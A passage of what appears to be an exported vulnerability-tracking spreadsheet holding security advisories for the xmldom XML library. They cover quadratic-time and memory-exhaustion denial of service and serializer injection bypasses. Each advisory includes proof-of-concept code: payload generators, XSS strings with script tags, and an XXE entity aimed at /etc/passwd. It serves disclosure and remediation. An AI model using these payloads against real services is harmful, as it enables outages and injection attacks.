- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621

### Finding B — `normalize()` adjacent-text O(K²) merge

`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.

Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).

Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533

### Finding B is additionally reachable programmatically (no parser involved)

`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:

- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.

`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.

## Affected Versions

Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.

## Proof of Concept

Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.

```js
const { DOMParser } = require('@xmldom/xmldom');

// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};

function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}

for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```

Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):

Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):

| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |

Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):

| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |

Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):

| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |

~32 KB of input → several seconds of single-threaded event-loop stall.

### Finding B via the public `normalize()` API (no parser)

```js
const { DOMImplementation } = require('@xmldom/xmldom');

function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```

Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):

| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |

This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.

## Fix Applied

Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t></is></c><c r="T1624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="1625"><c r="A1625" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1625" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D1625" s="5" t="inlineStr" /><c r="E1625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1625" s="5" t="inlineStr" /><c r="H1625" s="5" t="n"><v>0.004</v></c><c r="I1625" s="5" t="inlineStr" /><c r="J1625" s="5" t="inlineStr" /><c r="K1625" s="5" t="inlineStr" /><c r="L1625" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1625" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1625" s="5" t="inlineStr" /><c r="R1625" s="5" t="inlineStr" /><c r="S1625" s="5" t="inlineStr"><is><t>## Summary

When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.

## Details

`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:

```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```

https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540

The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.

## Proof of Concept

A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):

```js
const { DOMParser } = require('@xmldom/xmldom');

function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}

for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```

Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):

| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |

About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).

## Impact

Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).

## Severity note

The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.

## Fix Applied

Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="1626"><c r="A1626" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1626" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D1626" s="5" t="inlineStr" /><c r="E1626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1626" s="5" t="inlineStr" /><c r="H1626" s="5" t="n"><v>0.003</v></c><c r="I1626" s="5" t="inlineStr" /><c r="J1626" s="5" t="inlineStr" /><c r="K1626" s="5" t="inlineStr" /><c r="L1626" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1626" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1626" s="5" t="inlineStr" /><c r="R1626" s="5" t="inlineStr" /><c r="S1626" s="5" t="inlineStr"><is><t>## Summary

`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.

## Details

`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.

During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:

1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)

However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.

### Root Cause

1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`

## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Injecting elements via PI target

```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);

const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```

## Impact

Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:

- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security

## Fix Applied

Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in.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 Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;

// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)

### Residual limitation

The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t></is></c><c r="T1626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="1627"><c r="A1627" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1627" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D1627" s="5" t="inlineStr" /><c r="E1627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1627" s="5" t="inlineStr" /><c r="H1627" s="5" t="n"><v>0.003</v></c><c r="I1627" s="5" t="inlineStr" /><c r="J1627" s="5" t="inlineStr" /><c r="K1627" s="5" t="inlineStr" /><c r="L1627" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1627" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1627" s="5" t="inlineStr" /><c r="R1627" s="5" t="inlineStr" /><c r="S1627" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.

## Details

xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.

The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).

// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```

## Impact

- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.

## Fix Applied

The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.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```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);

// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```

### Why the default stays verbatim

The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t></is></c><c r="T1627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="1628"><c r="A1628" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1628" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D1628" s="5" t="inlineStr" /><c r="E1628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1628" s="5" t="inlineStr" /><c r="H1628" s="5" t="n"><v>0.003</v></c><c r="I1628" s="5" t="inlineStr" /><c r="J1628" s="5" t="inlineStr" /><c r="K1628" s="5" t="inlineStr" /><c r="L1628" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1628" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1628" s="5" t="inlineStr" /><c r="R1628" s="5" t="inlineStr" /><c r="S1628" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.

## Details

`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Affected Versions

Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.

## Fix Applied

The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.

### Proof of Concept - fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);

// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;

// Opt-in path — now throws instead of emitting the breakout:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```

### Why the default stays verbatim

The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.

### Residual limitation

The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
